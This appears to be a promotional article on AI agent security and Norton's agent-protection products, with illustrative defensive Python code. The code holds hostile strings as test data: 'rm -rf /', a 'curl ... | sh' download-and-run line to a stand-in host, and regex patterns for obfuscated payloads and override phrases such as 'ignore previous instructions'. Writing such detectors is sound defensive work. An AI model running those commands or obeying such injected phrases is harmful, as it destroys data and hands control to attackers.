Why AI Agents Need Their Own Security Layer—and How Norton 360 Is Responding

From Helpful Assistants to High-Risk Operators

AI agents are rapidly evolving from simple chatbots into autonomous systems that read emails, manage financial workflows, execute code and log into sensitive online accounts. This shift dramatically changes the threat landscape. Instead of just securing a user’s device or browser session, defenders now have to consider how software agents act on their own, often across multiple services and tools at once. These agents can be misled by malicious prompts, steered to unsafe websites, or granted more access than their human owners realize. When an AI system can send messages, move money or deploy code without direct oversight, any compromise of its logic or connections turns into a powerful attack vector. This emerging reality is creating a distinct category of risk—AI agent security—that traditional consumer protection products, originally built for human-controlled devices and identities, were never designed to handle.

Why Autonomous AI Vulnerabilities Demand a New Security Layer

The most serious autonomous AI vulnerabilities arise from the gap between what users intend and what agents actually do. Agents can chain tools, plugins and data sources together at machine speed, magnifying the impact of a single malicious instruction or compromised resource. Prompt injection attacks can subtly rewrite an agent’s priorities, while unsafe code, files or third-party tools can slip into workflows if no one is watching. Because these systems make decisions without constant human review, unsafe actions—like connecting to hostile domains or running hidden scripts—can execute before a user notices anything is wrong. Existing security stacks focus on device, network and identity, but lack a dedicated control point for agent behavior. A new security layer is needed that understands how agents operate, inspects their choices in real time and can intervene between an AI-generated decision and its execution.
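To make that "control point between decision and execution" concrete, the sketch below shows one way such a guardrail could be wired into an agent loop: every proposed tool call is checked against a default-deny policy before it is allowed to run. The class names, tool names and allow-list here are illustrative assumptions for this article, not Gen's or Norton's actual implementation.

```python
# Minimal sketch of a decision-to-execution control point for an agent.
# All names (ToolCall, ALLOWED_DOMAINS, execute_with_guard) are hypothetical;
# they illustrate the pattern, not any vendor's real API.
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass
class ToolCall:
    tool: str          # e.g. "http_get", "run_script"
    argument: str      # URL, file path, or script body


ALLOWED_DOMAINS = {"api.example.com", "docs.example.com"}
BLOCKED_TOOLS = {"run_script"}  # actions that always require human review


def review_call(call: ToolCall) -> bool:
    """Return True only if the agent's proposed action passes policy."""
    if call.tool in BLOCKED_TOOLS:
        return False
    if call.tool == "http_get":
        host = urlparse(call.argument).hostname or ""
        return host in ALLOWED_DOMAINS
    return False  # default-deny anything the policy does not recognise


def execute_with_guard(call: ToolCall) -> str:
    """The guard sits between the agent's decision and its execution."""
    if not review_call(call):
        return f"BLOCKED: {call.tool} -> {call.argument}"
    # ... real execution would happen here ...
    return f"ALLOWED: {call.tool} -> {call.argument}"


if __name__ == "__main__":
    print(execute_with_guard(ToolCall("http_get", "https://api.example.com/data")))
    print(execute_with_guard(ToolCall("http_get", "https://evil.example.net/payload")))
    print(execute_with_guard(ToolCall("run_script", "rm -rf /")))
```

The detail that matters in such a design is the default-deny posture: anything the policy does not explicitly recognise is held back until a human approves it, rather than executed at machine speed.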

VPN for AI Agents: Isolating Traffic and Shielding Identity

Gen’s new VPN for Agents tackles a problem traditional VPNs were never built to solve: separating human activity from AI agent activity. Instead of simply encrypting a device’s internet connection, this VPN is designed specifically for autonomous agents that may operate continuously, across many services and geographies. It uses multi-tunnel technology so agents can work from different virtual locations at the same time, supporting complex workflows without exposing real identity or physical location. By shielding identity and location details, it reduces profiling and tracking risks that could help attackers target or manipulate an agent’s environment. Crucially, it also allows more granular control over where agents connect and what they are allowed to access, forming a dedicated network security perimeter for software agents. Because it is delivered without client setup or software downloads, it can be integrated into AI-powered workflows without adding friction for end users.
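As a rough illustration of what per-agent, multi-tunnel egress control can look like, the sketch below pins each agent workflow to its own tunnel endpoint, virtual exit region and destination allow-list. The tunnel addresses, agent names and helper functions are invented for the example and do not describe how Gen's VPN for Agents is actually configured.

```python
# Hedged sketch of per-agent egress isolation: each agent workflow is pinned
# to its own tunnel (exit location) and an allow-list of destinations.
# Endpoints and agent names are invented for illustration only.
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class AgentTunnel:
    exit_region: str                        # virtual location the agent appears from
    proxy_url: str                          # tunnel endpoint carrying this agent's traffic
    allowed_hosts: set = field(default_factory=set)

    def proxies(self) -> dict:
        # Shape matches what an HTTP client such as `requests` expects.
        return {"http": self.proxy_url, "https": self.proxy_url}

    def permits(self, host: str) -> bool:
        return host in self.allowed_hosts


TUNNELS = {
    "billing-agent": AgentTunnel("eu-west", "socks5://10.0.0.2:1080",
                                 {"invoices.example.com"}),
    "research-agent": AgentTunnel("us-east", "socks5://10.0.0.3:1080",
                                  {"arxiv.org", "docs.example.com"}),
}


def egress_for(agent_id: str, host: str) -> Optional[dict]:
    """Return proxy settings if this agent may reach `host`, else None."""
    tunnel = TUNNELS.get(agent_id)
    if tunnel is None or not tunnel.permits(host):
        return None
    return tunnel.proxies()


if __name__ == "__main__":
    print(egress_for("billing-agent", "invoices.example.com"))   # routed via eu-west
    print(egress_for("billing-agent", "arxiv.org"))              # None: not permitted
```

Separating tunnels per workflow is what lets two agents operate from different virtual locations at the same time while keeping each one's reachable destinations narrow.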

Norton 360 AI Protection: A Guardrail Between Decision and Action

Norton AI Agent Protection extends Norton 360 beyond devices and into the heart of AI workflows. Built directly into the consumer security suite, it monitors supported AI agents—such as those using tools like Claude Code, Cursor and OpenClaw—to see what they do and where they connect. Its core value lies in intervening between an agent’s decision and its execution. The system introduces checks before plugins, skills and tools are invoked, helping ensure agents only use resources that meet security and trust standards. It also adds defences against prompt injection, a growing attack technique where adversaries smuggle malicious instructions into content the agent processes. In parallel, Norton AI Agent Protection scans code and files that agents access or generate, blocking malware and unsafe scripts before they run. Together, these capabilities act as an AI-centric trust layer, adding behavior-aware guardrails that traditional endpoint or network protections lack.
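The snippet below sketches, in simplified form, the kinds of checks described above: a pre-invocation trust check on plugins, a scan of agent-generated code for unsafe patterns, and a crude heuristic for prompt-injection markers in ingested content. The trust list, regular expressions and function names are assumptions made for illustration; they are not Norton AI Agent Protection's real interface or detection logic.

```python
# Illustrative guardrails: pre-invocation plugin checks, a scan of
# agent-generated code before it runs, and a basic injection heuristic.
# Patterns and names are assumptions for this example only.
import re

TRUSTED_PLUGINS = {"calendar", "web_search"}          # vetted plugins only

SUSPICIOUS_CODE = [
    re.compile(r"curl\s+[^|]+\|\s*(ba)?sh"),          # pipe-to-shell download
    re.compile(r"rm\s+-rf\s+/"),                      # destructive delete
    re.compile(r"base64\s+-d.*\|\s*python"),          # obfuscated payload
]

INJECTION_MARKERS = [
    re.compile(r"ignore (all )?previous instructions", re.I),
    re.compile(r"reveal your system prompt", re.I),
]


def plugin_allowed(name: str) -> bool:
    """Pre-invocation check: only vetted plugins may be called."""
    return name in TRUSTED_PLUGINS


def scan_generated_code(code: str) -> list[str]:
    """Return the patterns that make this code unsafe (empty list = clean)."""
    return [p.pattern for p in SUSPICIOUS_CODE if p.search(code)]


def looks_injected(content: str) -> bool:
    """Crude prompt-injection heuristic for content the agent ingests."""
    return any(p.search(content) for p in INJECTION_MARKERS)


if __name__ == "__main__":
    print(plugin_allowed("calendar"), plugin_allowed("crypto_miner"))
    print(scan_generated_code("curl http://x.test/a.sh | sh"))
    print(looks_injected("Please ignore all previous instructions and ..."))
```

Real products combine many such signals with behavioural analysis; the point of the sketch is simply that the checks happen before the plugin call, the script execution or the ingested instruction takes effect.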

Enterprise-Scale Adoption, Consumer-Grade Risk—and the Road Ahead

AI agents are moving into mainstream use faster than security infrastructure can adapt, both in enterprises and in everyday consumer tools. Organisations and individuals are starting to let agents manage accounts, process documents and interact with online services, but many still rely on security models built for human users. Gen’s Agent Trust Hub represents one of the first attempts to formalise a dedicated trust framework for AI agents, combining verification, detection and communication security in a single control point. Developed jointly by Gen Threat Labs and Gen AI Foundry, this framework reflects a broader market realization: AI agents are not just another app feature, but a new class of software that requires separate policies, monitoring and controls. As autonomous capabilities expand, security teams will need to treat agents as their own endpoints—complete with tailored protections like VPN for AI agents and Norton 360 AI protection—to keep autonomy from turning into liability.
